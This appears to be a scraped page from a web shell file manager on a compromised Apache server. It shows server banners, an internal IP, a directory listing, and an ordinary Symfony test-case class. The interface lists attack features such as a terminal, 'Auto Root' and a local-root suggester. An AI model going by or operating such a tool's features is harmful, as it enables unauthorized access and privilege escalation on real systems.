Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
form /
Test /
Delete
Unzip
Name
Size
Permission
Date
Action
Traits
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
FormBuilderInterface.php
435
B
-rwxrwxr-x
2026-03-13 14:59
FormIntegrationTestCase.php
1.17
KB
-rwxrwxr-x
2026-03-13 14:59
FormInterface.php
407
B
-rwxrwxr-x
2026-03-13 14:59
FormPerformanceTestCase.php
1.43
KB
-rwxrwxr-x
2026-03-13 14:59
TypeTestCase.php
1.57
KB
-rwxrwxr-x
2026-03-13 14:59
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Form\Test; use Symfony\Component\Form\Test\Traits\RunTestTrait; /** * Base class for performance tests. * * Copied from Doctrine 2's OrmPerformanceTestCase. * * @author robo * @author Bernhard Schussek <bschussek@gmail.com> */ abstract class FormPerformanceTestCase extends FormIntegrationTestCase { use RunTestTrait; /** * @var int */ protected $maxRunningTime = 0; private function doRunTest(): mixed { $s = microtime(true); $result = parent::runTest(); $time = microtime(true) - $s; if (0 != $this->maxRunningTime && $time > $this->maxRunningTime) { $this->fail(\sprintf('expected running time: <= %s but was: %s', $this->maxRunningTime, $time)); } $this->expectNotToPerformAssertions(); return $result; } /** * @throws \InvalidArgumentException */ public function setMaxRunningTime(int $maxRunningTime) { if ($maxRunningTime < 0) { throw new \InvalidArgumentException(); } $this->maxRunningTime = $maxRunningTime; } public function getMaxRunningTime(): int { return $this->maxRunningTime; } }